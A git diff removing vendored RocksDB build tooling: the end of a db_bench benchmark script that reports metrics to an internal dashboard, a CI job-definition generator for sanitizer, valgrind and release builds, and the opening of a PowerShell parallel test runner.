-# measure readrandom after load with filluniquerandom with 6GB block cache
-./db_bench \
-    --benchmarks=readrandom \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$((NUM / 4)) \
-    --reads=$((NUM / 4)) \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --disable_auto_compactions=1 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readrandom_filluniquerandom
-
-# measure readwhilewriting after load with filluniquerandom with 6GB block cache
-./db_bench \
-    --benchmarks=readwhilewriting \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --bloom_bits=10 \
-    --num=$((NUM / 4)) \
-    --reads=$((NUM / 4)) \
-    --benchmark_write_rate_limit=$(( 110 * 1024 )) \
-    --write_buffer_size=100000000 \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=16 > ${STAT_FILE}.readwhilewriting
-
-# measure memtable performance -- none of the data gets flushed to disk
-./db_bench \
-    --benchmarks=fillrandom,readrandom, \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --num=$((NUM / 10)) \
-    --reads=$NUM \
-    --cache_size=6442450944 \
-    --cache_numshardbits=6 \
-    --table_cache_numshardbits=4 \
-    --write_buffer_size=1000000000 \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --value_size=10 \
-    --threads=16 > ${STAT_FILE}.memtablefillreadrandom
-
-common_in_mem_args="--db=/dev/shm/rocksdb \
-    --num_levels=6 \
-    --key_size=20 \
-    --prefix_size=12 \
-    --keys_per_prefix=10 \
-    --value_size=100 \
-    --compression_type=none \
-    --compression_ratio=1 \
-    --hard_rate_limit=2 \
-    --write_buffer_size=134217728 \
-    --max_write_buffer_number=4 \
-    --level0_file_num_compaction_trigger=8 \
-    --level0_slowdown_writes_trigger=16 \
-    --level0_stop_writes_trigger=24 \
-    --target_file_size_base=134217728 \
-    --max_bytes_for_level_base=1073741824 \
-    --disable_wal=0 \
-    --wal_dir=/dev/shm/rocksdb \
-    --sync=0 \
-    --verify_checksum=1 \
-    --delete_obsolete_files_period_micros=314572800 \
-    --max_grandparent_overlap_factor=10 \
-    --use_plain_table=1 \
-    --open_files=-1 \
-    --mmap_read=1 \
-    --mmap_write=0 \
-    --memtablerep=prefix_hash \
-    --bloom_bits=10 \
-    --bloom_locality=1 \
-    --perf_level=0"
-
-# prepare a in-memory DB with 50M keys, total DB size is ~6G
-./db_bench \
-    $common_in_mem_args \
-    --statistics=0 \
-    --max_background_compactions=16 \
-    --max_background_flushes=16 \
-    --benchmarks=filluniquerandom \
-    --use_existing_db=0 \
-    --num=52428800 \
-    --threads=1 > /dev/null
-
-# Readwhilewriting
-./db_bench \
-    $common_in_mem_args \
-    --statistics=1 \
-    --max_background_compactions=4 \
-    --max_background_flushes=0 \
-    --benchmarks=readwhilewriting\
-    --use_existing_db=1 \
-    --duration=600 \
-    --threads=32 \
-    --benchmark_write_rate_limit=9502720 > ${STAT_FILE}.readwhilewriting_in_ram
-
-# Seekrandomwhilewriting
-./db_bench \
-    $common_in_mem_args \
-    --statistics=1 \
-    --max_background_compactions=4 \
-    --max_background_flushes=0 \
-    --benchmarks=seekrandomwhilewriting \
-    --use_existing_db=1 \
-    --use_tailing_iterator=1 \
-    --duration=600 \
-    --threads=32 \
-    --benchmark_write_rate_limit=9502720 > ${STAT_FILE}.seekwhilewriting_in_ram
-
-# measure fillseq with bunch of column families
-./db_bench \
-    --benchmarks=fillseq \
-    --num_column_families=500 \
-    --write_buffer_size=1048576 \
-    --db=$DATA_DIR \
-    --use_existing_db=0 \
-    --num=$NUM \
-    --writes=$NUM \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0  > ${STAT_FILE}.fillseq_lots_column_families
-
-# measure overwrite performance with bunch of column families
-./db_bench \
-    --benchmarks=overwrite \
-    --num_column_families=500 \
-    --write_buffer_size=1048576 \
-    --db=$DATA_DIR \
-    --use_existing_db=1 \
-    --num=$NUM \
-    --writes=$((NUM / 10)) \
-    --open_files=55000 \
-    --statistics=1 \
-    --histogram=1 \
-    --disable_wal=1 \
-    --sync=0 \
-    --threads=8 > ${STAT_FILE}.overwrite_lots_column_families
-
-# send data to ods
-function send_to_ods {
-  key="$1"
-  value="$2"
-
-  if [ -z $JENKINS_HOME ]; then
-    # running on devbox, just print out the values
-    echo $1 $2
-    return
-  fi
-
-  if [ -z "$value" ];then
-    echo >&2 "ERROR: Key $key doesn't have a value."
-    return
-  fi
-  curl -s "https://www.intern.facebook.com/intern/agent/ods_set.php?entity=rocksdb_build$git_br&key=$key&value=$value" \
-    --connect-timeout 60
-}
-
-function send_benchmark_to_ods {
-  bench="$1"
-  bench_key="$2"
-  file="$3"
-
-  QPS=$(grep $bench $file | awk '{print $5}')
-  P50_MICROS=$(grep $bench $file -A 6 | grep "Percentiles" | awk '{print $3}' )
-  P75_MICROS=$(grep $bench $file -A 6 | grep "Percentiles" | awk '{print $5}' )
-  P99_MICROS=$(grep $bench $file -A 6 | grep "Percentiles" | awk '{print $7}' )
-
-  send_to_ods rocksdb.build.$bench_key.qps $QPS
-  send_to_ods rocksdb.build.$bench_key.p50_micros $P50_MICROS
-  send_to_ods rocksdb.build.$bench_key.p75_micros $P75_MICROS
-  send_to_ods rocksdb.build.$bench_key.p99_micros $P99_MICROS
-}
-
-send_benchmark_to_ods overwrite overwrite $STAT_FILE.overwrite
-send_benchmark_to_ods fillseq fillseq $STAT_FILE.fillseq
-send_benchmark_to_ods readrandom readrandom $STAT_FILE.readrandom
-send_benchmark_to_ods readrandom readrandom_tailing $STAT_FILE.readrandomtailing
-send_benchmark_to_ods readrandom readrandom_smallblockcache $STAT_FILE.readrandomsmallblockcache
-send_benchmark_to_ods readrandom readrandom_memtable_sst $STAT_FILE.readrandom_mem_sst
-send_benchmark_to_ods readrandom readrandom_fillunique_random $STAT_FILE.readrandom_filluniquerandom
-send_benchmark_to_ods fillrandom memtablefillrandom $STAT_FILE.memtablefillreadrandom
-send_benchmark_to_ods readrandom memtablereadrandom $STAT_FILE.memtablefillreadrandom
-send_benchmark_to_ods readwhilewriting readwhilewriting $STAT_FILE.readwhilewriting
-send_benchmark_to_ods readwhilewriting readwhilewriting_in_ram ${STAT_FILE}.readwhilewriting_in_ram
-send_benchmark_to_ods seekrandomwhilewriting seekwhilewriting_in_ram ${STAT_FILE}.seekwhilewriting_in_ram
-send_benchmark_to_ods fillseq fillseq_lots_column_families ${STAT_FILE}.fillseq_lots_column_families
-send_benchmark_to_ods overwrite overwrite_lots_column_families ${STAT_FILE}.overwrite_lots_column_families
diff --git a/thirdparty/rocksdb/build_tools/rocksdb-lego-determinator b/thirdparty/rocksdb/build_tools/rocksdb-lego-determinator
deleted file mode 100755
index 6e8ae9c..0000000
--- a/thirdparty/rocksdb/build_tools/rocksdb-lego-determinator
+++ /dev/null
@@ -1,782 +0,0 @@
-#!/usr/bin/env bash
-# This script is executed by Sandcastle
-# to determine next steps to run
-
-# Usage:
-# EMAIL=<email> ONCALL=<email> TRIGGER=<trigger> SUBSCRIBER=<email> rocks_ci.py <test-name>
-#
-# Input         Value
-# -------------------------------------------------------------------------
-# EMAIL         Email address to report on trigger conditions
-# ONCALL        Email address to raise a task on failure
-# TRIGGER       Trigger conditions for email. Valid values are fail, warn, all
-# SUBSCRIBER    Email addresss to add as subscriber for task
-#
-
-#
-# Report configuration
-#
-REPORT_EMAIL=
-if [ ! -z $EMAIL ]; then
-  if [ -z $TRIGGER ]; then
-    TRIGGER="fail"
-  fi
-
-  REPORT_EMAIL="
-  {
-      'type':'email',
-      'triggers': [ '$TRIGGER' ],
-      'emails':['$EMAIL']
-  },"
-fi
-
-CREATE_TASK=
-if [ ! -z $ONCALL ]; then
-  CREATE_TASK="
-  {
-      'type':'task',
-      'triggers':[ 'fail' ],
-      'priority':0,
-      'subscribers':[ '$SUBSCRIBER' ],
-      'tags':[ 'rocksdb', 'ci' ],
-  },"
-fi
-
-# For now, create the tasks using only the dedicated task creation tool.
-CREATE_TASK=
-
-REPORT=
-if [[ ! -z $REPORT_EMAIL || ! -z $CREATE_TASK ]]; then
-  REPORT="'report': [
-    $REPORT_EMAIL
-    $CREATE_TASK
-  ]"
-fi
-
-#
-# Helper variables
-#
-CLEANUP_ENV="
-{
-    'name':'Cleanup environment',
-    'shell':'rm -rf /dev/shm/rocksdb && mkdir /dev/shm/rocksdb && (chmod +t /dev/shm || true)  && make clean',
-    'user':'root'
-}"
-
-# We will eventually set the RATIO to 1, but we want do this
-# in steps. RATIO=$(nproc) will make it work as J=1
-if [ -z $RATIO ]; then
-  RATIO=$(nproc)
-fi
-
-if [ -z $PARALLEL_J ]; then
-  PARALLEL_J="J=$(expr $(nproc) / ${RATIO})"
-fi
-
-if [ -z $PARALLEL_j ]; then
-  PARALLEL_j="-j$(expr $(nproc) / ${RATIO})"
-fi
-
-PARALLELISM="$PARALLEL_J $PARALLEL_j"
-
-DEBUG="OPT=-g"
-SHM="TEST_TMPDIR=/dev/shm/rocksdb"
-NON_SHM="TMPD=/tmp/rocksdb_test_tmp"
-GCC_481="ROCKSDB_FBCODE_BUILD_WITH_481=1"
-ASAN="COMPILE_WITH_ASAN=1"
-CLANG="USE_CLANG=1"
-LITE="OPT=\"-DROCKSDB_LITE -g\""
-TSAN="COMPILE_WITH_TSAN=1"
-UBSAN="COMPILE_WITH_UBSAN=1"
-DISABLE_JEMALLOC="DISABLE_JEMALLOC=1"
-HTTP_PROXY="https_proxy=http://fwdproxy.29.prn1:8080 http_proxy=http://fwdproxy.29.prn1:8080 ftp_proxy=http://fwdproxy.29.prn1:8080"
-SETUP_JAVA_ENV="export $HTTP_PROXY; export JAVA_HOME=/usr/local/jdk-8u60-64/; export PATH=\$JAVA_HOME/bin:\$PATH"
-PARSER="'parser':'python build_tools/error_filter.py $1'"
-
-CONTRUN_NAME="ROCKSDB_CONTRUN_NAME"
-
-# This code is getting called under various scenarios. What we care about is to
-# understand when it's called from nightly contruns because in that case we'll
-# create tasks for any failures. To follow the existing pattern, we'll check
-# the value of $ONCALL. If it's a diff then just call `false` to make sure
-# that errors will be properly propagated to the caller.
-if [ ! -z $ONCALL ]; then
-  TASK_CREATION_TOOL="/usr/local/bin/mysql_mtr_filter --rocksdb --oncall $ONCALL"
-else
-  TASK_CREATION_TOOL="false"
-fi
-
-ARTIFACTS=" 'artifacts': [
-    {
-        'name':'database',
-        'paths':[ '/dev/shm/rocksdb' ],
-    }
-]"
-
-#
-# A mechanism to disable tests temporarily
-#
-DISABLE_COMMANDS="[
-    {
-        'name':'Disable test',
-        'oncall':'$ONCALL',
-        'steps': [
-            {
-              'name':'Job disabled. Please contact test owner',
-              'shell':'exit 1',
-              'user':'root'
-            },
-        ],
-    }
-]"
-
-#
-# RocksDB unit test
-#
-UNIT_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug version',
-                'shell':'$SHM $DEBUG make $PARALLELISM check || $CONTRUN_NAME=check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test not under /dev/shm
-#
-UNIT_TEST_NON_SHM_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug version',
-                'timeout': 86400,
-                'shell':'$NON_SHM $DEBUG make $PARALLELISM check || $CONTRUN_NAME=non_shm_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB release build and unit tests
-#
-RELEASE_BUILD_COMMANDS="[
-    {
-        'name':'Rocksdb Release Build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB release',
-                'shell':'make $PARALLEL_j release || $CONTRUN_NAME=release $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test on gcc-4.8.1
-#
-UNIT_TEST_COMMANDS_481="[
-    {
-        'name':'Rocksdb Unit Test on GCC 4.8.1',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug version',
-                'shell':'$SHM $GCC_481 $DEBUG make $PARALLELISM check || $CONTRUN_NAME=unit_gcc_481_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB release build and unit tests
-#
-RELEASE_BUILD_COMMANDS_481="[
-    {
-        'name':'Rocksdb Release on GCC 4.8.1',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB release on GCC 4.8.1',
-                'shell':'$GCC_481 make $PARALLEL_j release || $CONTRUN_NAME=release_gcc481 $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test with CLANG
-#
-CLANG_UNIT_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and test RocksDB debug',
-                'shell':'$CLANG $SHM $DEBUG make $PARALLELISM check || $CONTRUN_NAME=clang_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB release build with CLANG
-#
-CLANG_RELEASE_BUILD_COMMANDS="[
-    {
-        'name':'Rocksdb CLANG Release Build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB release',
-                'shell':'$CLANG make $PARALLEL_j release|| $CONTRUN_NAME=clang_release $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB analyze
-#
-CLANG_ANALYZE_COMMANDS="[
-    {
-        'name':'Rocksdb analyze',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'RocksDB build and analyze',
-                'shell':'$CLANG $SHM $DEBUG make $PARALLEL_j analyze || $CONTRUN_NAME=clang_analyze $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB code coverage
-#
-CODE_COV_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test Code Coverage',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build, test and collect code coverage info',
-                'shell':'$SHM $DEBUG make $PARALLELISM coverage || $CONTRUN_NAME=coverage $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unity
-#
-UNITY_COMMANDS="[
-    {
-        'name':'Rocksdb Unity',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build, test unity test',
-                'shell':'$SHM $DEBUG V=1 make J=1 unity_test || $CONTRUN_NAME=unity_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# Build RocksDB lite
-#
-LITE_BUILD_COMMANDS="[
-    {
-        'name':'Rocksdb Lite build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB debug version',
-                'shell':'$LITE make J=1 all check || $CONTRUN_NAME=lite $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB stress/crash test
-#
-STRESS_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Stress/Crash Test',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB debug stress tests',
-                'shell':'$SHM $DEBUG make J=1 db_stress || $CONTRUN_NAME=db_stress $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-            {
-                'name':'Build and run RocksDB debug crash tests',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make J=1 crash_test || $CONTRUN_NAME=crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        $ARTIFACTS,
-        $REPORT
-    }
-]"
-
-# RocksDB write stress test.
-# We run on disk device on purpose (i.e. no $SHM)
-# because we want to add some randomness to fsync commands
-WRITE_STRESS_COMMANDS="[
-    {
-        'name':'Rocksdb Write Stress Test',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB write stress tests',
-                'shell':'make write_stress && python tools/write_stress_runner.py --runtime_sec=3600 --db=/tmp/rocksdb_write_stress || $CONTRUN_NAME=write_stress $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        'artifacts': [{'name': 'database', 'paths': ['/tmp/rocksdb_write_stress']}],
-        $REPORT
-    }
-]"
-
-
-#
-# RocksDB test under address sanitizer
-#
-ASAN_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under ASAN',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Test RocksDB debug under ASAN',
-'shell':'set -o pipefail && ($SHM $ASAN $DEBUG make $PARALLELISM asan_check || $CONTRUN_NAME=asan_check $TASK_CREATION_TOOL) |& /usr/facebook/ops/scripts/asan_symbolize.py -d',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB crash testing under address sanitizer
-#
-ASAN_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb crash test under ASAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB debug asan_crash_test',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make J=1 asan_crash_test || $CONTRUN_NAME=asan_crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB test under undefined behavior sanitizer
-#
-UBSAN_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under UBSAN',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Test RocksDB debug under UBSAN',
-                'shell':'set -o pipefail && $SHM $UBSAN $DEBUG make $PARALLELISM ubsan_check || $CONTRUN_NAME=ubsan_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            }
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB crash testing under udnefined behavior sanitizer
-#
-UBSAN_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb crash test under UBSAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build and run RocksDB debug ubsan_crash_test',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make J=1 ubsan_crash_test || $CONTRUN_NAME=ubsan_crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB unit test under valgrind
-#
-VALGRIND_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under valgrind',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit tests',
-                'timeout': 86400,
-                'shell':'$SHM $DEBUG make $PARALLELISM valgrind_test || $CONTRUN_NAME=valgrind_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB test under TSAN
-#
-TSAN_UNIT_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Unit Test under TSAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit test',
-                'timeout': 86400,
-                'shell':'set -o pipefail && $SHM $DEBUG $TSAN make $PARALLELISM check || $CONTRUN_NAME=tsan_check $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB crash test under TSAN
-#
-TSAN_CRASH_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Crash Test under TSAN',
-        'oncall':'$ONCALL',
-        'timeout': 86400,
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Compile and run',
-                'timeout': 86400,
-                'shell':'set -o pipefail && $SHM $DEBUG $TSAN CRASH_TEST_KILL_ODD=1887 CRASH_TEST_EXT_ARGS=--log2_keys_per_lock=22  make J=1 crash_test || $CONTRUN_NAME=tsan_crash_test $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB format compatible
-#
-
-run_format_compatible()
-{
-  export TEST_TMPDIR=/dev/shm/rocksdb
-  rm -rf /dev/shm/rocksdb
-  mkdir /dev/shm/rocksdb
-
-  tools/check_format_compatible.sh
-}
-
-FORMAT_COMPATIBLE_COMMANDS="[
-    {
-        'name':'Rocksdb Format Compatible tests',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit test',
-                'shell':'build_tools/rocksdb-lego-determinator run_format_compatible || $CONTRUN_NAME=run_format_compatible $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB no compression
-#
-run_no_compression()
-{
-  export TEST_TMPDIR=/dev/shm/rocksdb
-  rm -rf /dev/shm/rocksdb
-  mkdir /dev/shm/rocksdb
-  make clean
-  cat build_tools/fbcode_config.sh | grep -iv dzlib | grep -iv dlz4 | grep -iv dsnappy | grep -iv dbzip2 > .tmp.fbcode_config.sh
-  mv .tmp.fbcode_config.sh build_tools/fbcode_config.sh
-  cat Makefile | grep -v tools/ldb_test.py > .tmp.Makefile
-  mv .tmp.Makefile Makefile
-  make $DEBUG J=1 check
-}
-
-NO_COMPRESSION_COMMANDS="[
-    {
-        'name':'Rocksdb No Compression tests',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Run RocksDB debug unit test',
-                'shell':'build_tools/rocksdb-lego-determinator run_no_compression || $CONTRUN_NAME=run_no_compression $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB regression
-#
-run_regression()
-{
-  time -v bash -vx ./build_tools/regression_build_test.sh $(mktemp -d  $WORKSPACE/leveldb.XXXX) $(mktemp leveldb_test_stats.XXXX)
-
-  # ======= report size to ODS ========
-
-  # parameters: $1 -- key, $2 -- value
-  function send_size_to_ods {
-    curl -s "https://www.intern.facebook.com/intern/agent/ods_set.php?entity=rocksdb_build&key=rocksdb.build_size.$1&value=$2" \
-      --connect-timeout 60
-  }
-
-  # === normal build ===
-  make clean
-  make -j$(nproc) static_lib
-  send_size_to_ods static_lib $(stat --printf="%s" librocksdb.a)
-  strip librocksdb.a
-  send_size_to_ods static_lib_stripped $(stat --printf="%s" librocksdb.a)
-
-  make -j$(nproc) shared_lib
-  send_size_to_ods shared_lib $(stat --printf="%s" `readlink -f librocksdb.so`)
-  strip `readlink -f librocksdb.so`
-  send_size_to_ods shared_lib_stripped $(stat --printf="%s" `readlink -f librocksdb.so`)
-
-  # === lite build ===
-  make clean
-  OPT=-DROCKSDB_LITE make -j$(nproc) static_lib
-  send_size_to_ods static_lib_lite $(stat --printf="%s" librocksdb.a)
-  strip librocksdb.a
-  send_size_to_ods static_lib_lite_stripped $(stat --printf="%s" librocksdb.a)
-
-  OPT=-DROCKSDB_LITE make -j$(nproc) shared_lib
-  send_size_to_ods shared_lib_lite $(stat --printf="%s" `readlink -f librocksdb.so`)
-  strip `readlink -f librocksdb.so`
-  send_size_to_ods shared_lib_lite_stripped $(stat --printf="%s" `readlink -f librocksdb.so`)
-}
-
-REGRESSION_COMMANDS="[
-    {
-        'name':'Rocksdb regression commands',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Make and run script',
-                'shell':'build_tools/rocksdb-lego-determinator run_regression || $CONTRUN_NAME=run_regression $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-#
-# RocksDB Java build
-#
-JAVA_BUILD_TEST_COMMANDS="[
-    {
-        'name':'Rocksdb Java Build',
-        'oncall':'$ONCALL',
-        'steps': [
-            $CLEANUP_ENV,
-            {
-                'name':'Build RocksDB for Java',
-                'shell':'$SETUP_JAVA_ENV; $SHM make rocksdbjava || $CONTRUN_NAME=rocksdbjava $TASK_CREATION_TOOL',
-                'user':'root',
-                $PARSER
-            },
-        ],
-        $REPORT
-    }
-]"
-
-
-case $1 in
-  unit)
-    echo $UNIT_TEST_COMMANDS
-    ;;
-  unit_non_shm)
-    echo $UNIT_TEST_NON_SHM_COMMANDS
-    ;;
-  release)
-    echo $RELEASE_BUILD_COMMANDS
-    ;;
-  unit_481)
-    echo $UNIT_TEST_COMMANDS_481
-    ;;
-  release_481)
-    echo $RELEASE_BUILD_COMMANDS_481
-    ;;
-  clang_unit)
-    echo $CLANG_UNIT_TEST_COMMANDS
-    ;;
-  clang_release)
-    echo $CLANG_RELEASE_BUILD_COMMANDS
-    ;;
-  clang_analyze)
-    echo $CLANG_ANALYZE_COMMANDS
-    ;;
-  code_cov)
-    echo $CODE_COV_COMMANDS
-    ;;
-  unity)
-    echo $UNITY_COMMANDS
-    ;;
-  lite)
-    echo $LITE_BUILD_COMMANDS
-    ;;
-  stress_crash)
-    echo $STRESS_CRASH_TEST_COMMANDS
-    ;;
-  write_stress)
-    echo $WRITE_STRESS_COMMANDS
-    ;;
-  asan)
-    echo $ASAN_TEST_COMMANDS
-    ;;
-  asan_crash)
-    echo $ASAN_CRASH_TEST_COMMANDS
-    ;;
-  ubsan)
-    echo $UBSAN_TEST_COMMANDS
-    ;;
-  ubsan_crash)
-    echo $UBSAN_CRASH_TEST_COMMANDS
-    ;;
-  valgrind)
-    echo $VALGRIND_TEST_COMMANDS
-    ;;
-  tsan)
-    echo $TSAN_UNIT_TEST_COMMANDS
-    ;;
-  tsan_crash)
-    echo $TSAN_CRASH_TEST_COMMANDS
-    ;;
-  format_compatible)
-    echo $FORMAT_COMPATIBLE_COMMANDS
-    ;;
-  run_format_compatible)
-    run_format_compatible
-    ;;
-  no_compression)
-    echo $NO_COMPRESSION_COMMANDS
-    ;;
-  run_no_compression)
-    run_no_compression
-    ;;
-  regression)
-    echo $REGRESSION_COMMANDS
-    ;;
-  run_regression)
-    run_regression
-    ;;
-  java_build)
-    echo $JAVA_BUILD_TEST_COMMANDS
-    ;;
-  *)
-    echo "Invalid determinator command"
-    ;;
-esac
diff --git a/thirdparty/rocksdb/build_tools/run_ci_db_test.ps1 b/thirdparty/rocksdb/build_tools/run_ci_db_test.ps1
deleted file mode 100644
index c8167ed..0000000
--- a/thirdparty/rocksdb/build_tools/run_ci_db_test.ps1
+++ /dev/null
@@ -1,456 +0,0 @@
-# This script enables you running RocksDB tests by running
-# All the tests concurrently and utilizing all the cores
-Param(
-  [switch]$EnableJE = $false,  # Look for and use _je executable, append _je to listed exclusions
-  [switch]$RunAll = $false,    # Will attempt discover all *_test[_je].exe binaries and run all
-                               # of them as Google suites. I.e. It will run test cases concurrently
-                               # except those mentioned as $Run, those will run as individual test cases
-                               # And any execlued with $ExcludeExes or $ExcludeCases
-                               # It will also not run any individual test cases
-                               # excluded but $ExcludeCasese
-  [string]$SuiteRun = "",      # Split test suites in test cases and run in parallel, not compatible with $RunAll
-  [string]$Run = "",           # Run specified executables in parallel but do not split to test cases
-  [string]$ExcludeCases = "",  # Exclude test cases, expects a comma separated list, no spaces
-                               # Takes effect when $RunAll or $SuiteRun is specified. Must have full
-                               # Test cases name including a group and a parameter if any
-  [string]$ExcludeExes = "",   # Exclude exes from consideration, expects a comma separated list,
-                               # no spaces. Takes effect only when $RunAll is specified
-  [string]$WorkFolder = "",    # Direct tests to use that folder. SSD or Ram drive are better options.
-   # Number of async tasks that would run concurrently. Recommend a number below 64.
-   # However, CPU utlization really depends on the storage media. Recommend ram based disk.
-   # a value of 1 will run everything serially
-  [int]$Concurrency = 8,
-  [int]$Limit = -1 # -1 means do not limit for test purposes
-)
-
-# Folders and commands must be fullpath to run assuming
-# the current folder is at the root of the git enlistment
-$StartDate = (Get-Date)
-$StartDate
-
-
-$DebugPreference = "Continue"
-
-# These tests are not google test suites and we should guard
-# Against running them as suites
-$RunOnly = New-Object System.Collections.Generic.HashSet[string]
-$RunOnly.Add("c_test") | Out-Null
-$RunOnly.Add("compact_on_deletion_collector_test") | Out-Null
